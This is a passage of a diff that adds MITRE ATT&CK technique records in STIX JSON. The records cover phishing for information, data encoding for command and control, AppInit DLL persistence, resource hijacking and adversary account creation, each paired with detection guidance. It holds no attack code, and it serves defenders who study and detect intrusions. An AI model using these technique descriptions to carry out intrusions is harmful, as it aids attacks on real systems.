Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Much of this activity may have a very high occurrence and associated false positive rate, as well as potentially taking place outside the visibility of the target organization, making detection difficult for defenders.\n\nDetection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.0", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cc723aff-ec88-40e3-a224-5af9fd983cc4", + "created": "2020-10-02T16:37:30.015Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1591/004", + "external_id": "T1591.004" + }, + { + "source_name": "ThreatPost Broadvoice Leak", + "description": "Seals, T. (2020, October 15). Broadvoice Leak Exposes 350M Records, Personal Voicemail Transcripts. Retrieved October 20, 2020.", + "url": "https://threatpost.com/broadvoice-leaks-350m-records-voicemail-transcripts/160158/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-04-21T12:20:20.711Z", + "name": "Data Encoding", + "description": "Adversaries may encode data to make the content of command and control traffic more difficult to detect. Command and control (C2) information can be encoded using a standard data encoding system. Use of data encoding may adhere to existing protocol specifications and includes use of ASCII, Unicode, Base64, MIME, or other binary-to-text and character encoding systems.(Citation: Wikipedia Binary-to-text Encoding) (Citation: Wikipedia Character Encoding) Some data encoding systems may also result in data compression, such as gzip.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "command-and-control" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Itzik Kotler, SafeBreach" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Linux", + "macOS", + "Windows" + ], + "x_mitre_version": "1.2", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cc7b8c4e-9be0-47ca-b0bb-83915ec3ee2f", + "created": "2017-05-31T21:31:43.540Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1132", + "external_id": "T1132" + }, + { + "source_name": "University of Birmingham C2", + "description": "Gardiner, J., Cova, M., Nagaraja, S. (2014, February). Command & Control Understanding, Denying and Detecting. Retrieved April 20, 2016.", + "url": "https://arxiv.org/ftp/arxiv/papers/1408/1408.1136.pdf" + }, + { + "source_name": "Wikipedia Binary-to-text Encoding", + "description": "Wikipedia. (2016, December 26). Binary-to-text encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Binary-to-text_encoding" + }, + { + "source_name": "Wikipedia Character Encoding", + "description": "Wikipedia. (2017, February 19). Character Encoding. Retrieved March 1, 2017.", + "url": "https://en.wikipedia.org/wiki/Character_encoding" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-05-09T14:00:00.188Z", + "name": "AppInit DLLs", + "description": "Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows NT\\CurrentVersion\\Windows or HKEY_LOCAL_MACHINE\\Software\\Wow6432Node\\Microsoft\\Windows NT\\CurrentVersion\\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. (Citation: Elastic Process Injection July 2017)\n\nSimilar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. (Citation: AppInit Registry) Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity. \n\nThe AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. (Citation: AppInit Secure Boot)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "privilege-escalation" + }, + { + "kill_chain_name": "mitre-attack", + "phase_name": "persistence" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Monitor DLL loads by processes that load user32.dll and look for DLLs that are not recognized or not normally loaded into a process. Monitor the AppInit_DLLs Registry values for modifications that do not correlate with known software, patch cycles, etc. Monitor and analyze application programming interface (API) calls that are indicative of Registry edits such as RegCreateKeyEx and RegSetValueEx. (Citation: Elastic Process Injection July 2017)\n\nTools such as Sysinternals Autoruns may also be used to detect system changes that could be attempts at persistence, including listing current AppInit DLLs. (Citation: TechNet Autoruns) \n\nLook for abnormal process behavior that may be due to a process loading a malicious DLL. Data and events should not be viewed in isolation, but as part of a chain of behavior that could lead to other activities, such as making network connections for Command and Control, learning details about the environment through Discovery, and conducting Lateral Movement.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": true, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "x_mitre_effective_permissions": [ + "Administrator", + "SYSTEM" + ], + "x_mitre_permissions_required": [ + "Administrator" + ], + "x_mitre_system_requirements": [ + "Secure boot disabled on systems running Windows 8 and later" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cc89ecbd-3d33-4a41-bcca-001e702d18fd", + "created": "2020-01-24T14:52:25.589Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1546/010", + "external_id": "T1546.010" + }, + { + "source_name": "Elastic Process Injection July 2017", + "description": "Hosseini, A. (2017, July 18). Ten Process Injection Techniques: A Technical Survey Of Common And Trending Process Injection Techniques. Retrieved December 7, 2017.", + "url": "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + }, + { + "source_name": "AppInit Registry", + "description": "Microsoft. (2006, October). Working with the AppInit_DLLs registry value. Retrieved July 15, 2015.", + "url": "https://support.microsoft.com/en-us/kb/197571" + }, + { + "source_name": "AppInit Secure Boot", + "description": "Microsoft. (n.d.). AppInit DLLs and Secure Boot. Retrieved July 15, 2015.", + "url": "https://msdn.microsoft.com/en-us/library/dn280412" + }, + { + "source_name": "TechNet Autoruns", + "description": "Russinovich, M. (2016, January 4). Autoruns for Windows v13.51. Retrieved June 6, 2016.", + "url": "https://technet.microsoft.com/en-us/sysinternals/bb963902" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-09-08T20:28:49.600Z", + "name": "Phishing for Information", + "description": "Adversaries may send phishing messages to elicit sensitive information that can be used during targeting. Phishing for information is an attempt to trick targets into divulging information, frequently credentials or other actionable information. Phishing for information is different from [Phishing](https://attack.mitre.org/techniques/T1566) in that the objective is gathering data from the victim rather than executing malicious code.\n\nAll forms of phishing are electronically delivered social engineering. Phishing can be targeted, known as spearphishing. In spearphishing, a specific individual, company, or industry will be targeted by the adversary. More generally, adversaries can conduct non-targeted phishing, such as in mass credential harvesting campaigns.\n\nAdversaries may also try to obtain information directly through the exchange of emails, instant messages, or other electronic conversation means.(Citation: ThreatPost Social Media Phishing)(Citation: TrendMictro Phishing)(Citation: PCMag FakeLogin)(Citation: Sophos Attachment)(Citation: GitHub Phishery) Victims may also receive phishing messages that direct them to call a phone number where the adversary attempts to collect confidential information.(Citation: Avertium callback phishing)\n\nPhishing for information frequently involves social engineering techniques, such as posing as a source with a reason to collect information (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)) and/or sending multiple, seemingly urgent messages. Another way to accomplish this is by forging or spoofing(Citation: Proofpoint-spoof) the identity of the sender which can be used to fool both the human recipient as well as automated security tools.(Citation: cyberproof-double-bounce) \n\nPhishing for information may also involve evasive techniques, such as removing or manipulating emails or metadata/headers from compromised accounts being abused to send messages (e.g., [Email Hiding Rules](https://attack.mitre.org/techniques/T1564/008)).(Citation: Microsoft OAuth Spam 2022)(Citation: Palo Alto Unit 42 VBA Infostealer 2014)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "reconnaissance" + } + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_contributors": [ + "Philip Winther", + "Sebastian Salla, McAfee", + "Robert Simmons, @MalwareUtkonos", + "Ohad Zaidenberg, @ohad_mz", + "Liora Itkin", + "Liran Ravich, CardinalOps", + "Scott Cook, Capital One" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Depending on the specific method of phishing, the detections can vary. Monitor for suspicious email activity, such as numerous accounts receiving messages from a single unusual/unknown sender. Filtering based on DKIM+SPF or header analysis can help detect when the email sender is spoofed.(Citation: Microsoft Anti Spoofing)(Citation: ACSC Email Spoofing)\n\nWhen it comes to following links, monitor for references to uncategorized or known-bad sites. URL inspection within email (including expanding shortened links) can also help detect links leading to known malicious sites.\n\nMonitor social media traffic for suspicious activity, including messages requesting information as well as abnormal file or data transfers (especially those involving unknown, or otherwise suspicious accounts).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cca0ccb6-a068-4574-a722-b1556f86833a", + "created": "2020-10-02T17:07:01.502Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1598", + "external_id": "T1598" + }, + { + "source_name": "ACSC Email Spoofing", + "description": "Australian Cyber Security Centre. (2012, December). Mitigating Spoofed Emails Using Sender Policy Framework. Retrieved October 19, 2020.", + "url": "https://www.cyber.gov.au/sites/default/files/2019-03/spoof_email_sender_policy_framework.pdf" + }, + { + "source_name": "Avertium callback phishing", + "description": "Avertium. (n.d.). EVERYTHING YOU NEED TO KNOW ABOUT CALLBACK PHISHING. Retrieved February 2, 2023.", + "url": "https://www.avertium.com/resources/threat-reports/everything-you-need-to-know-about-callback-phishing" + }, + { + "source_name": "TrendMictro Phishing", + "description": "Babon, P. (2020, September 3). Tricky 'Forms' of Phishing. Retrieved October 20, 2020.", + "url": "https://www.trendmicro.com/en_us/research/20/i/tricky-forms-of-phishing.html" + }, + { + "source_name": "Sophos Attachment", + "description": "Ducklin, P. (2020, October 2). Serious Security: Phishing without links – when phishers bring along their own web pages. Retrieved October 20, 2020.", + "url": "https://nakedsecurity.sophos.com/2020/10/02/serious-security-phishing-without-links-when-phishers-bring-along-their-own-web-pages/" + }, + { + "source_name": "cyberproof-double-bounce", + "description": "Itkin, Liora. (2022, September 1). Double-bounced attacks with email spoofing . Retrieved February 24, 2023.", + "url": "https://blog.cyberproof.com/blog/double-bounced-attacks-with-email-spoofing-2022-trends" + }, + { + "source_name": "PCMag FakeLogin", + "description": "Kan, M. (2019, October 24). Hackers Try to Phish United Nations Staffers With Fake Login Pages. Retrieved October 20, 2020.", + "url": "https://www.pcmag.com/news/hackers-try-to-phish-united-nations-staffers-with-fake-login-pages" + }, + { + "source_name": "Microsoft Anti Spoofing", + "description": "Microsoft. (2020, October 13). Anti-spoofing protection in EOP. Retrieved October 19, 2020.", + "url": "https://docs.microsoft.com/en-us/microsoft-365/security/office-365-security/anti-spoofing-protection?view=o365-worldwide" + }, + { + "source_name": "Microsoft OAuth Spam 2022", + "description": "Microsoft. (2023, September 22). Malicious OAuth applications abuse cloud email services to spread spam. Retrieved March 13, 2023.", + "url": "https://www.microsoft.com/en-us/security/blog/2022/09/22/malicious-oauth-applications-used-to-compromise-email-servers-and-spread-spam/" + }, + { + "source_name": "ThreatPost Social Media Phishing", + "description": "O'Donnell, L. (2020, October 20). Facebook: A Top Launching Pad For Phishing Attacks. Retrieved October 20, 2020.", + "url": "https://threatpost.com/facebook-launching-pad-phishing-attacks/160351/" + }, + { + "source_name": "Proofpoint-spoof", + "description": "Proofpoint. (n.d.). What Is Email Spoofing?. Retrieved February 24, 2023.", + "url": "https://www.proofpoint.com/us/threat-reference/email-spoofing" + }, + { + "source_name": "GitHub Phishery", + "description": "Ryan Hanson. (2016, September 24). phishery. Retrieved October 23, 2020.", + "url": "https://github.com/ryhanson/phishery" + }, + { + "source_name": "Palo Alto Unit 42 VBA Infostealer 2014", + "description": "Vicky Ray and Rob Downs. (2014, October 29). Examining a VBA-Initiated Infostealer Campaign. Retrieved March 13, 2023.", + "url": "https://unit42.paloaltonetworks.com/examining-vba-initiated-infostealer-campaign/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-14T21:00:00.467Z", + "name": "Resource Hijacking", + "description": "Adversaries may leverage the resources of co-opted systems to complete resource-intensive tasks, which may impact system and/or hosted service availability. \n\nOne common purpose for Resource Hijacking is to validate transactions of cryptocurrency networks and earn virtual currency. Adversaries may consume enough system resources to negatively impact and/or cause affected machines to become unresponsive.(Citation: Kaspersky Lazarus Under The Hood Blog 2017) Servers and cloud-based systems are common targets because of the high potential for available resources, but user endpoint systems may also be compromised and used for Resource Hijacking and cryptocurrency mining.(Citation: CloudSploit - Unused AWS Regions) Containerized environments may also be targeted due to the ease of deployment via exposed APIs and the potential for scaling mining activities by deploying or compromising multiple containers within an environment or cluster.(Citation: Unit 42 Hildegard Malware)(Citation: Trend Micro Exposed Docker APIs)\n\nAdditionally, some cryptocurrency mining malware identify then kill off processes for competing malware to ensure it’s not competing for resources.(Citation: Trend Micro War of Crypto Miners)\n\nAdversaries may also use malware that leverages a system's network bandwidth as part of a botnet in order to facilitate [Network Denial of Service](https://attack.mitre.org/techniques/T1498) campaigns and/or to seed malicious torrents.(Citation: GoBotKR) Alternatively, they may engage in proxyjacking by selling use of the victims' network bandwidth and IP address to proxyware services.(Citation: Sysdig Proxyjacking)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "impact" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [ + "David Fiser, @anu4is, Trend Micro", + "Alfredo Oliveira, Trend Micro", + "Jay Chen, Palo Alto Networks", + "Magno Logan, @magnologan, Trend Micro", + "Vishwas Manral, McAfee", + "Yossi Weizman, Azure Defender Research Team", + "Goldstein Menachem" + ], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring process resource usage to determine anomalous activity associated with malicious hijacking of computer resources such as CPU, memory, and graphics processing resources. Monitor for suspicious use of network resources associated with cryptocurrency mining software. Monitor for common cryptomining software process names and files on local systems that may indicate compromise and resource usage.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "Windows", + "IaaS", + "Linux", + "macOS", + "Containers" + ], + "x_mitre_version": "1.5", + "x_mitre_data_sources": [], + "x_mitre_impact_type": [ + "Availability" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cd25c1b4-935c-4f0e-ba8d-552f28bc4783", + "created": "2019-04-17T14:50:05.682Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1496", + "external_id": "T1496" + }, + { + "source_name": "Unit 42 Hildegard Malware", + "description": "Chen, J. et al. (2021, February 3). Hildegard: New TeamTNT Cryptojacking Malware Targeting Kubernetes. Retrieved April 5, 2021.", + "url": "https://unit42.paloaltonetworks.com/hildegard-malware-teamtnt/" + }, + { + "source_name": "CloudSploit - Unused AWS Regions", + "description": "CloudSploit. (2019, June 8). The Danger of Unused AWS Regions. Retrieved October 8, 2019.", + "url": "https://medium.com/cloudsploit/the-danger-of-unused-aws-regions-af0bf1b878fc" + }, + { + "source_name": "Sysdig Proxyjacking", + "description": "Crystal Morin. (2023, April 4). Proxyjacking has Entered the Chat. Retrieved July 6, 2023.", + "url": "https://sysdig.com/blog/proxyjacking-attackers-log4j-exploited/" + }, + { + "source_name": "Kaspersky Lazarus Under The Hood Blog 2017", + "description": "GReAT. (2017, April 3). Lazarus Under the Hood. Retrieved April 17, 2019.", + "url": "https://securelist.com/lazarus-under-the-hood/77908/" + }, + { + "source_name": "Trend Micro Exposed Docker APIs", + "description": "Oliveira, A. (2019, May 30). Infected Containers Target Docker via Exposed APIs. Retrieved April 6, 2021.", + "url": "https://www.trendmicro.com/en_us/research/19/e/infected-cryptocurrency-mining-containers-target-docker-hosts-with-exposed-apis-use-shodan-to-find-additional-victims.html" + }, + { + "source_name": "Trend Micro War of Crypto Miners", + "description": "Oliveira, A., Fiser, D. (2020, September 10). War of Linux Cryptocurrency Miners: A Battle for Resources. Retrieved April 6, 2021.", + "url": "https://www.trendmicro.com/en_us/research/20/i/war-of-linux-cryptocurrency-miners-a-battle-for-resources.html" + }, + { + "source_name": "GoBotKR", + "description": "Zuzana Hromcová. (2019, July 8). Malicious campaign targets South Korean users with backdoor‑laced torrents. Retrieved March 31, 2022.", + "url": "https://www.welivesecurity.com/2019/07/08/south-korean-users-backdoor-torrents/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-10-13T17:57:11.152Z", + "name": "Valid Accounts", + "description": "Adversaries may steal the credentials of a specific user or service account using credential access techniques. In some cases, default credentials for control system devices may be publicly available. Compromised credentials may be used to bypass access controls placed on various resources on hosts and within the network, and may even be used for persistent access to remote systems. Compromised and default credentials may also grant an adversary increased privilege to specific systems and devices or access to restricted areas of the network. Adversaries may choose not to use malware or tools, in conjunction with the legitimate access those credentials provide, to make it harder to detect their presence or to control devices and send legitimate commands in an unintended way. \n\nAdversaries may also create accounts, sometimes using predefined account names and passwords, to provide a means of backup access for persistence. (Citation: Booz Allen Hamilton) \n\nThe overlap of credentials and permissions across a network of systems is of concern because the adversary may be able to pivot across accounts and systems to reach a high level of access (i.e., domain or enterprise administrator) and possibly between the enterprise and operational technology environments. Adversaries may be able to leverage valid credentials from one system to gain access to another system.", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "persistence" + }, + { + "kill_chain_name": "mitre-ics-attack", + "phase_name": "lateral-movement" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "None" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [ + "User Account: User Account Authentication", + "Logon Session: Logon Session Creation", + "Logon Session: Logon Session Metadata" + ], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cd2c76a4-5e23-4ca5-9c40-d5e0604f7101", + "created": "2020-05-21T17:43:26.506Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T0859", + "external_id": "T0859" + }, + { + "source_name": "Booz Allen Hamilton", + "description": "Booz Allen Hamilton When The Lights Went Out Retrieved. 2019/10/22 ", + "url": "https://www.boozallen.com/content/dam/boozallen/documents/2016/09/ukraine-report-when-the-lights-went-out.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2024-02-28T21:08:56.520Z", + "name": "Establish Accounts", + "description": "Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nFor operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.(Citation: NEWSCASTER2014)(Citation: BlackHatRobinSage)\n\nEstablishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Phishing](https://attack.mitre.org/techniques/T1566).(Citation: Mandiant APT1) In addition, establishing accounts may allow adversaries to abuse free services, such as registering for trial periods to [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) for malicious purposes.(Citation: Free Trial PurpleUrchin)\n", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "3.2.0", + "x_mitre_contributors": [], + "x_mitre_deprecated": false, + "x_mitre_detection": "Consider monitoring social media activity related to your organization. Suspicious activity may include personas claiming to work for your organization or recently created/modified accounts making numerous connection requests to accounts affiliated with your organization.\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Initial Access (ex: [Phishing](https://attack.mitre.org/techniques/T1566)).", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.3", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--cdfc5f0a-9bb9-4352-b896-553cfa2d8fd8", + "created": "2020-10-01T01:05:42.216Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1585", + "external_id": "T1585" + }, + { + "source_name": "Free Trial PurpleUrchin", + "description": "Gamazo, William. Quist, Nathaniel.. (2023, January 5). PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources. Retrieved February 28, 2024.", + "url": "https://unit42.paloaltonetworks.com/purpleurchin-steals-cloud-resources/" + }, + { + "source_name": "NEWSCASTER2014", + "description": "Lennon, M. (2014, May 29). Iranian Hackers Targeted US Officials in Elaborate Social Media Attack Operation. Retrieved March 1, 2017.", + "url": "https://www.securityweek.com/iranian-hackers-targeted-us-officials-elaborate-social-media-attack-operation" + }, + { + "source_name": "Mandiant APT1", + "description": "Mandiant. (n.d.). APT1 Exposing One of China’s Cyber Espionage Units. Retrieved July 18, 2016.", + "url": "https://www.fireeye.com/content/dam/fireeye-www/services/pdfs/mandiant-apt1-report.pdf" + }, + { + "source_name": "BlackHatRobinSage", + "description": "Ryan, T. (2010). “Getting In Bed with Robin Sage.”. Retrieved March 6, 2017.", + "url": "http://media.blackhat.com/bh-us-10/whitepapers/Ryan/BlackHat-USA-2010-Ryan-Getting-In-Bed-With-Robin-Sage-v1.0.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2022-04-25T14:00:00.188Z", + "name": "Obtain Capabilities", + "description": "Adversaries may buy and/or steal capabilities that can be used during targeting. Rather than developing their own capabilities in-house, adversaries may purchase, freely download, or steal them. Activities may include the acquisition of malware, software (including licenses), exploits, certificates, and information relating to vulnerabilities. Adversaries may obtain capabilities to support their operations throughout numerous phases of the adversary lifecycle.\n\nIn addition to downloading free malware, software, and exploits from the internet, adversaries may purchase these capabilities from third-party entities. Third-party entities can include technology companies that specialize in malware and exploits, criminal marketplaces, or from individuals.(Citation: NationsBuying)(Citation: PegasusCitizenLab)\n\nIn addition to purchasing capabilities, adversaries may steal capabilities from third-party entities (including other adversaries). This can include stealing software licenses, malware, SSL/TLS and code-signing certificates, or raiding closed databases of vulnerabilities or exploits.(Citation: DiginotarCompromise)", + "kill_chain_phases": [ + { + "kill_chain_name": "mitre-attack", + "phase_name": "resource-development" + } + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_contributors": [], + "x_mitre_detection": "Consider analyzing malware for features that may be associated with malware providers, such as compiler used, debugging artifacts, code similarities, or even group identifiers associated with specific Malware-as-a-Service (MaaS) offerings. Malware repositories can also be used to identify additional samples associated with the developers and the adversary utilizing their services. Identifying overlaps in malware use by different adversaries may indicate malware was obtained by the adversary rather than developed by them. In some cases, identifying overlapping characteristics in malware used by different adversaries may point to a shared quartermaster.(Citation: FireEyeSupplyChain) Malware repositories can also be used to identify features of tool use associated with an adversary, such as watermarks in [Cobalt Strike](https://attack.mitre.org/software/S0154) payloads.(Citation: Analyzing CS Dec 2020)\n\nConsider use of services that may aid in the tracking of newly issued certificates and/or certificates in use on sites across the Internet. In some cases it may be possible to pivot on known pieces of certificate information to uncover other adversary infrastructure.(Citation: Splunk Kovar Certificates 2017) Some server-side components of adversary tools may have default values set for SSL/TLS certificates.(Citation: Recorded Future Beacon Certificates)\n\nMuch of this activity will take place outside the visibility of the target organization, making detection of this behavior difficult. Detection efforts may be focused on related stages of the adversary lifecycle, such as during Defense Evasion or Command and Control.", + "x_mitre_domains": [ + "enterprise-attack" + ], + "x_mitre_is_subtechnique": false, + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_platforms": [ + "PRE" + ], + "x_mitre_version": "1.1", + "x_mitre_data_sources": [], + "type": "attack-pattern", + "spec_version": "2.1", + "id": "attack-pattern--ce0687a0-e692-4b77-964a-0784a8e54ff1", + "created": "2020-10-01T01:56:24.776Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/techniques/T1588", + "external_id": "T1588" + }, + { + "source_name": "NationsBuying", + "description": "Nicole Perlroth and David E. Sanger. (2013, July 12). Nations Buying as Hackers Sell Flaws in Computer Code. Retrieved March 9, 2017.", + "url": "https://www.nytimes.com/2013/07/14/world/europe/nations-buying-as-hackers-sell-computer-flaws.html" + }, + { + "source_name": "PegasusCitizenLab", + "description": "Bill Marczak and John Scott-Railton. (2016, August 24). The Million Dollar Dissident: NSO Group’s iPhone Zero-Days used against a UAE Human Rights Defender. Retrieved December 12, 2016.", + "url": "https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/" + }, + { + "source_name": "DiginotarCompromise", + "description": "Fisher, D. (2012, October 31). Final Report on DigiNotar Hack Shows Total Compromise of CA Servers. Retrieved March 6, 2017.", + "url": "https://threatpost.com/final-report-diginotar-hack-shows-total-compromise-ca-servers-103112/77170/" + }, + { + "source_name": "FireEyeSupplyChain", + "description": "FireEye. (2014). SUPPLY CHAIN ANALYSIS: From Quartermaster to SunshopFireEye. Retrieved March 6, 2017.", + "url": "https://www.mandiant.com/resources/supply-chain-analysis-from-quartermaster-to-sunshop" + }, + { + "source_name": "Analyzing CS Dec 2020", + "description": "Maynier, E. (2020, December 20). Analyzing Cobalt Strike for Fun and Profit. Retrieved October 12, 2021.", + "url": "https://www.randhome.io/blog/2020/12/20/analyzing-cobalt-strike-for-fun-and-profit/" + }, + { + "source_name": "Splunk Kovar Certificates 2017", + "description": "Kovar, R. (2017, December 11). Tall Tales of Hunting with TLS/SSL Certificates. Retrieved October 16, 2020.", + "url": "https://www.splunk.com/en_us/blog/security/tall-tales-of-hunting-with-tls-ssl-certificates.html" + }, + { + "source_name": "Recorded Future Beacon Certificates", + "description": "Insikt Group. (2019, June 18). A Multi-Method Approach to Identifying Rogue Cobalt Strike Servers. Retrieved October 16, 2020.", + "url": "https://www.recordedfuture.com/cobalt-strike-servers/" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-07-28T18:17:34.185Z", + "name": "Screensaver", + "description": "Adversaries may establish persistence by executing malicious content triggered by user inactivity. Screensavers are programs that execute after a configurable time of user inactivity and consist of Portable Executable 